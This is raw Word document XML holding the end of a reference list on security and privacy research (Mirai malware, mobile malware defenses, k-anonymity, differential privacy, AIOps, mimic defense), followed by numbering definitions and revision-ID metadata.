        <w:r w:rsidR="00591C8D" w:rsidRPr="00F76D2B">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Mirai_(malware)</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="2F1B022C" w14:textId="05D395DA" w:rsidR="002B5A01" w:rsidRPr="002B5A01" w:rsidRDefault="00591C8D" w:rsidP="002B5A01">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Ref61079018"/>
      <w:r w:rsidRPr="00196341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">He D, Chan S, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00196341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Guizani</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00196341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> M. Mobile application security: malware threats and defenses. IEEE Wireless Communications. 2015 Mar 9;22(1):138-44.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="75F46945" w14:textId="77777777" w:rsidR="002B5A01" w:rsidRPr="00F76D2B" w:rsidRDefault="002B5A01" w:rsidP="00F76D2B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Ref61162920"/>
      <w:r w:rsidRPr="00F76D2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sweeney L. k-anonymity: A model for protecting privacy. International Journal of Uncertainty, Fuzziness and Knowledge-Based Systems. 2002 Oct;10(05):557-70.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6899F90D" w14:textId="28B0B371" w:rsidR="002B5A01" w:rsidRDefault="002B5A01" w:rsidP="00C2423C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Ref61162910"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F76D2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Dwork</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F76D2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> C. Differential privacy: A survey of results. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F76D2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>InInternational</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F76D2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> conference on theory and applications of models of computation 2008 Apr 25 (pp. 1-19). Springer, Berlin, Heidelberg.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1DE0BD76" w14:textId="4490A1F4" w:rsidR="00EA0E5C" w:rsidRPr="00EA0E5C" w:rsidRDefault="00EA0E5C" w:rsidP="00EA0E5C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Ref61081215"/>
      <w:r w:rsidRPr="001F24F5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Dang Y, Lin Q, Huang P. AIOps: real-world challenges and research innovations. In2019 IEEE/ACM 41st International Conference on Software Engineering: Companion Proceedings (ICSE-Companion) 2019 May 25 (pp. 4-5). IEEE.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="40C22C4A" w14:textId="77777777" w:rsidR="00EC66E9" w:rsidRPr="00C2423C" w:rsidRDefault="00EC66E9" w:rsidP="00C2423C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Ref61081243"/>
      <w:r w:rsidRPr="00C2423C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>邬江兴</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2423C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2423C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>网络空间拟态防御研究</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2423C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2423C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>信息安全学报</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2423C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>. 2016(4):1-0.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="0DF0B0E6" w14:textId="7B3DE112" w:rsidR="00D85AC5" w:rsidRPr="001F24F5" w:rsidRDefault="00D85AC5" w:rsidP="001F24F5">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D85AC5" w:rsidRPr="001F24F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B5440" w14:textId="77777777" w:rsidR="00F12C93" w:rsidRDefault="00F12C93" w:rsidP="006B78EE">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="158F96EF" w14:textId="77777777" w:rsidR="00F12C93" w:rsidRDefault="00F12C93" w:rsidP="006B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C17A" w14:textId="77777777" w:rsidR="003447A2" w:rsidRDefault="003447A2" w:rsidP="006B78EE">
    <w:pPr>
      <w:pStyle w:val="af0"/>
      <w:ind w:firstLine="360"/>
      <w:rPr>
        <w:rStyle w:val="af9"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="af9"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="af9"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE  </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="af9"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="2AC10983" w14:textId="77777777" w:rsidR="003447A2" w:rsidRDefault="003447A2" w:rsidP="006B78E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EA3B5" w14:textId="77777777" w:rsidR="003447A2" w:rsidRDefault="003447A2" w:rsidP="006B78E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8F43" w14:textId="77777777" w:rsidR="00BF2273" w:rsidRDefault="00BF2273">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5949C" w14:textId="77777777" w:rsidR="00F12C93" w:rsidRDefault="00F12C93" w:rsidP="006B78EE">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4A8A9E4E" w14:textId="77777777" w:rsidR="00F12C93" w:rsidRDefault="00F12C93" w:rsidP="006B7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85649" w14:textId="77777777" w:rsidR="00BF2273" w:rsidRDefault="00BF227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309B5" w14:textId="77777777" w:rsidR="00BF2273" w:rsidRDefault="00BF2273">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536B0" w14:textId="77777777" w:rsidR="00BF2273" w:rsidRDefault="00BF2273">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21D"/>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36106"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C89C854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C0018FF"/>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B5F1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21C011A6"/>
    <w:lvl w:ilvl="0" w:tplc="703AE8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78961"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="10378961"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="10E97D4D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8384D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316341"/>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5126"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C214F43C"/>
    <w:lvl w:ilvl="0" w:tplc="87DA2F38">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="780" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:color w:val="auto"/>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20481C7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A42C967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25852152"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="123AA640"/>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AA23BC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="49442852"/>
    <w:lvl w:ilvl="0" w:tplc="2664119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2DDE5084"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87541FC8"/>
    <w:lvl w:ilvl="0" w:tplc="3E3855C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1CF176E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05A4BBFC"/>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3E1737B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE0EABB6"/>
    <w:lvl w:ilvl="0" w:tplc="E63AE0F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5E314C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E8AADF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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="37F87204"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="442845A0"/>
    <w:lvl w:ilvl="0" w:tplc="6BFC38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9C86A64"/>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2C4593"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57E0AB2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3C63511A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="123AA640"/>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22F52B7"/>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49245B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F1E648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44B44AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D2C8A60"/>
    <w:lvl w:ilvl="0" w:tplc="4AE479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6319C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3198DD5A"/>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BEB316A"/>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35F76B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4F35F76B"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="524F59FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1BB8E298"/>
    <w:lvl w:ilvl="0" w:tplc="3E3855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3B81330"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20941DC8"/>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41B5449"/>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151553"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4C68AAB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8B775A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3FFC30C0"/>
    <w:lvl w:ilvl="0" w:tplc="D950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3B4694"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C982109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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5E6805B8"/>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30845"/>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2A1C2C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="49442852"/>
    <w:lvl w:ilvl="0" w:tplc="2664119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644E5787"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="28EEB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8450E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0058771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70507D41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4B616B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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="70BB17D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4BCD896"/>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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="70D31276"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D32E3CC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78B34B17"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6066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425873"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A94FBBE"/>
    <w:lvl w:ilvl="0" w:tplc="3E3855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5"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="41">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G0MDQ0MDU3Nzc0NzVS0lEKTi0uzszPAykwrAUAQcWBxSwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="0011072F"/>
    <w:rsid w:val="000027C4"/>
    <w:rsid w:val="0000467C"/>
    <w:rsid w:val="000060ED"/>
    <w:rsid w:val="00006DA8"/>
    <w:rsid w:val="000101D9"/>
    <w:rsid w:val="000103A8"/>
    <w:rsid w:val="0001206B"/>
    <w:rsid w:val="00014124"/>
    <w:rsid w:val="000166F8"/>
    <w:rsid w:val="000205A9"/>
    <w:rsid w:val="00024697"/>
    <w:rsid w:val="00027B25"/>
    <w:rsid w:val="00030CD0"/>
    <w:rsid w:val="00031A19"/>
    <w:rsid w:val="00032497"/>
    <w:rsid w:val="00034665"/>
    <w:rsid w:val="000354C9"/>
    <w:rsid w:val="000362C1"/>
    <w:rsid w:val="00036A91"/>
    <w:rsid w:val="000370D3"/>
    <w:rsid w:val="00041B55"/>
    <w:rsid w:val="00042797"/>
    <w:rsid w:val="0004323D"/>
    <w:rsid w:val="00044999"/>
    <w:rsid w:val="00047287"/>
    <w:rsid w:val="00050FCA"/>
    <w:rsid w:val="00052CF6"/>
    <w:rsid w:val="00054AA6"/>
    <w:rsid w:val="00055EE3"/>
    <w:rsid w:val="00061120"/>
    <w:rsid w:val="000629D0"/>
    <w:rsid w:val="00062A31"/>
    <w:rsid w:val="000648AE"/>
    <w:rsid w:val="000657C3"/>
    <w:rsid w:val="0007111B"/>
    <w:rsid w:val="00072242"/>
    <w:rsid w:val="0007491D"/>
    <w:rsid w:val="00074E57"/>
    <w:rsid w:val="0007578B"/>
    <w:rsid w:val="00077AA4"/>
    <w:rsid w:val="00082826"/>
    <w:rsid w:val="00083959"/>
    <w:rsid w:val="00084033"/>
    <w:rsid w:val="00085216"/>
    <w:rsid w:val="0008542E"/>
    <w:rsid w:val="000914E1"/>
    <w:rsid w:val="0009184F"/>
    <w:rsid w:val="00091A35"/>
    <w:rsid w:val="00094DBB"/>
    <w:rsid w:val="00094EF5"/>
    <w:rsid w:val="00095B40"/>
    <w:rsid w:val="00096B86"/>
    <w:rsid w:val="00096BC3"/>
    <w:rsid w:val="00096CE5"/>
    <w:rsid w:val="000978CA"/>
    <w:rsid w:val="00097FF2"/>
    <w:rsid w:val="000A2E9B"/>
    <w:rsid w:val="000A3B02"/>
    <w:rsid w:val="000A56F8"/>
    <w:rsid w:val="000A6278"/>
    <w:rsid w:val="000A62F8"/>
    <w:rsid w:val="000A7D6A"/>
    <w:rsid w:val="000B0BE5"/>
    <w:rsid w:val="000B2CED"/>
    <w:rsid w:val="000B52FF"/>
    <w:rsid w:val="000B6401"/>
    <w:rsid w:val="000B6F3D"/>
    <w:rsid w:val="000B7DB1"/>
    <w:rsid w:val="000B7DEE"/>
    <w:rsid w:val="000C1127"/>
    <w:rsid w:val="000C546D"/>
    <w:rsid w:val="000C57C6"/>
    <w:rsid w:val="000C74FA"/>
    <w:rsid w:val="000D0560"/>
    <w:rsid w:val="000D1E37"/>
    <w:rsid w:val="000E1373"/>
    <w:rsid w:val="000E448D"/>
    <w:rsid w:val="000E4844"/>
    <w:rsid w:val="000E4E5F"/>
    <w:rsid w:val="000E5089"/>
    <w:rsid w:val="000E555C"/>
    <w:rsid w:val="000E7418"/>
    <w:rsid w:val="000F0531"/>
    <w:rsid w:val="00100082"/>
    <w:rsid w:val="001023E0"/>
    <w:rsid w:val="00102990"/>
    <w:rsid w:val="001030C9"/>
    <w:rsid w:val="001055E4"/>
    <w:rsid w:val="00105DB2"/>
    <w:rsid w:val="00107B9B"/>
    <w:rsid w:val="0011072F"/>
    <w:rsid w:val="00111ECF"/>
    <w:rsid w:val="00113758"/>
    <w:rsid w:val="00114C23"/>
    <w:rsid w:val="001168D0"/>
    <w:rsid w:val="00116A93"/>
    <w:rsid w:val="00120C44"/>
    <w:rsid w:val="001319E7"/>
    <w:rsid w:val="00132EE7"/>
    <w:rsid w:val="001333C5"/>
    <w:rsid w:val="001349AB"/>
    <w:rsid w:val="00134A20"/>
    <w:rsid w:val="001359EA"/>
    <w:rsid w:val="001369A1"/>
    <w:rsid w:val="00140523"/>
    <w:rsid w:val="00140C87"/>
    <w:rsid w:val="00141410"/>
    <w:rsid w:val="001430F5"/>
    <w:rsid w:val="0014392A"/>
    <w:rsid w:val="001453F7"/>
    <w:rsid w:val="00147789"/>
    <w:rsid w:val="001510F8"/>
    <w:rsid w:val="001536AA"/>
    <w:rsid w:val="00154D53"/>
    <w:rsid w:val="00156D65"/>
    <w:rsid w:val="00156EF7"/>
    <w:rsid w:val="001575EE"/>
    <w:rsid w:val="0016031D"/>
    <w:rsid w:val="00160433"/>
    <w:rsid w:val="00160A0A"/>
    <w:rsid w:val="0016635C"/>
    <w:rsid w:val="00173AD8"/>
    <w:rsid w:val="00174820"/>
    <w:rsid w:val="00175E7B"/>
    <w:rsid w:val="00177C8F"/>
    <w:rsid w:val="00181484"/>
    <w:rsid w:val="00181EC1"/>
    <w:rsid w:val="0018338B"/>
    <w:rsid w:val="00187777"/>
    <w:rsid w:val="001912FB"/>
    <w:rsid w:val="00192BB2"/>
    <w:rsid w:val="00192F4B"/>
    <w:rsid w:val="00193FB0"/>
    <w:rsid w:val="00196341"/>
    <w:rsid w:val="001A1B2D"/>
    <w:rsid w:val="001A2C8C"/>
    <w:rsid w:val="001A6092"/>
    <w:rsid w:val="001A629F"/>
    <w:rsid w:val="001B3C9C"/>
    <w:rsid w:val="001B4401"/>
    <w:rsid w:val="001B6DDE"/>
    <w:rsid w:val="001B71FC"/>
    <w:rsid w:val="001B7236"/>
    <w:rsid w:val="001C42C6"/>
    <w:rsid w:val="001D01F8"/>
    <w:rsid w:val="001D157F"/>
    <w:rsid w:val="001D451A"/>
    <w:rsid w:val="001D6A8B"/>
    <w:rsid w:val="001E1541"/>
    <w:rsid w:val="001E3FA5"/>
    <w:rsid w:val="001E74F6"/>
    <w:rsid w:val="001F24F5"/>
    <w:rsid w:val="001F4496"/>
    <w:rsid w:val="001F4C27"/>
    <w:rsid w:val="001F5C6F"/>
    <w:rsid w:val="001F6167"/>
    <w:rsid w:val="001F7755"/>
    <w:rsid w:val="00201D9F"/>
    <w:rsid w:val="00202B70"/>
    <w:rsid w:val="00202FBD"/>
    <w:rsid w:val="00204CB6"/>
    <w:rsid w:val="00205A54"/>
    <w:rsid w:val="00206107"/>
    <w:rsid w:val="0021533A"/>
    <w:rsid w:val="00215619"/>
    <w:rsid w:val="00216805"/>
    <w:rsid w:val="002212CE"/>
    <w:rsid w:val="00222BE4"/>
    <w:rsid w:val="00224D6F"/>
    <w:rsid w:val="00225473"/>
    <w:rsid w:val="00227C74"/>
    <w:rsid w:val="00232F30"/>
    <w:rsid w:val="002346F2"/>
    <w:rsid w:val="0023798D"/>
    <w:rsid w:val="00247655"/>
    <w:rsid w:val="00247DD3"/>
    <w:rsid w:val="00253573"/>
    <w:rsid w:val="00255601"/>
    <w:rsid w:val="00256791"/>
    <w:rsid w:val="002639AE"/>
    <w:rsid w:val="00264767"/>
    <w:rsid w:val="00266CF6"/>
    <w:rsid w:val="0027023E"/>
    <w:rsid w:val="00270833"/>
    <w:rsid w:val="00272045"/>
    <w:rsid w:val="0027309A"/>
    <w:rsid w:val="0027392B"/>
    <w:rsid w:val="00274675"/>
    <w:rsid w:val="00275555"/>
    <w:rsid w:val="00280B2C"/>
    <w:rsid w:val="00280F81"/>
    <w:rsid w:val="00282281"/>
    <w:rsid w:val="00284C26"/>
    <w:rsid w:val="002876F8"/>
    <w:rsid w:val="00290265"/>
    <w:rsid w:val="00290DBB"/>
    <w:rsid w:val="00293BF0"/>
    <w:rsid w:val="0029677F"/>
    <w:rsid w:val="002970F1"/>
    <w:rsid w:val="002A038E"/>
    <w:rsid w:val="002A12C0"/>
    <w:rsid w:val="002A60C6"/>
    <w:rsid w:val="002A64B9"/>
    <w:rsid w:val="002A758C"/>
    <w:rsid w:val="002B1315"/>
    <w:rsid w:val="002B17CE"/>
    <w:rsid w:val="002B448C"/>
    <w:rsid w:val="002B4BAC"/>
    <w:rsid w:val="002B5A01"/>
    <w:rsid w:val="002B6509"/>
    <w:rsid w:val="002C00FB"/>
    <w:rsid w:val="002C13CF"/>
    <w:rsid w:val="002C257A"/>
    <w:rsid w:val="002C6D98"/>
    <w:rsid w:val="002D38CD"/>
    <w:rsid w:val="002D49E0"/>
    <w:rsid w:val="002D4AFD"/>
    <w:rsid w:val="002E5361"/>
    <w:rsid w:val="002E5561"/>
    <w:rsid w:val="002E5CF4"/>
    <w:rsid w:val="002E5FA1"/>
    <w:rsid w:val="002F1A17"/>
    <w:rsid w:val="002F36F1"/>
    <w:rsid w:val="002F45DA"/>
    <w:rsid w:val="002F45FE"/>
    <w:rsid w:val="002F4B88"/>
    <w:rsid w:val="002F7200"/>
    <w:rsid w:val="002F7983"/>
    <w:rsid w:val="00303918"/>
    <w:rsid w:val="0030560A"/>
    <w:rsid w:val="00307AF5"/>
    <w:rsid w:val="00313141"/>
    <w:rsid w:val="003138DD"/>
    <w:rsid w:val="00313B5B"/>
    <w:rsid w:val="00315435"/>
    <w:rsid w:val="00317B69"/>
    <w:rsid w:val="0032219B"/>
    <w:rsid w:val="00322A73"/>
    <w:rsid w:val="0032741C"/>
    <w:rsid w:val="00333540"/>
    <w:rsid w:val="00333AB8"/>
    <w:rsid w:val="00336425"/>
    <w:rsid w:val="00336CA7"/>
    <w:rsid w:val="003447A2"/>
    <w:rsid w:val="003451B5"/>
    <w:rsid w:val="00350D4F"/>
    <w:rsid w:val="003553C8"/>
    <w:rsid w:val="00360F59"/>
    <w:rsid w:val="00364743"/>
    <w:rsid w:val="00364DAD"/>
    <w:rsid w:val="0037033B"/>
    <w:rsid w:val="003704DE"/>
    <w:rsid w:val="003707D7"/>
    <w:rsid w:val="003737CC"/>
    <w:rsid w:val="00373B43"/>
    <w:rsid w:val="00374D1A"/>
    <w:rsid w:val="0038201D"/>
    <w:rsid w:val="003842B8"/>
    <w:rsid w:val="003934A2"/>
    <w:rsid w:val="00395D69"/>
    <w:rsid w:val="00396D0E"/>
    <w:rsid w:val="0039745E"/>
    <w:rsid w:val="00397BC1"/>
    <w:rsid w:val="003A0256"/>
    <w:rsid w:val="003A0576"/>
    <w:rsid w:val="003A18F0"/>
    <w:rsid w:val="003A2356"/>
    <w:rsid w:val="003A3879"/>
    <w:rsid w:val="003A3AAF"/>
    <w:rsid w:val="003A4FB6"/>
    <w:rsid w:val="003A565E"/>
    <w:rsid w:val="003A6698"/>
    <w:rsid w:val="003A77C7"/>
    <w:rsid w:val="003B59C3"/>
    <w:rsid w:val="003B65D4"/>
    <w:rsid w:val="003B6705"/>
    <w:rsid w:val="003B6D5B"/>
    <w:rsid w:val="003B6FFB"/>
    <w:rsid w:val="003B701F"/>
    <w:rsid w:val="003B7C41"/>
    <w:rsid w:val="003C0605"/>
    <w:rsid w:val="003C27B9"/>
    <w:rsid w:val="003C48B4"/>
    <w:rsid w:val="003D2FCB"/>
    <w:rsid w:val="003D36F9"/>
    <w:rsid w:val="003D4185"/>
    <w:rsid w:val="003D671B"/>
    <w:rsid w:val="003D681E"/>
    <w:rsid w:val="003D6DB4"/>
    <w:rsid w:val="003E6DEA"/>
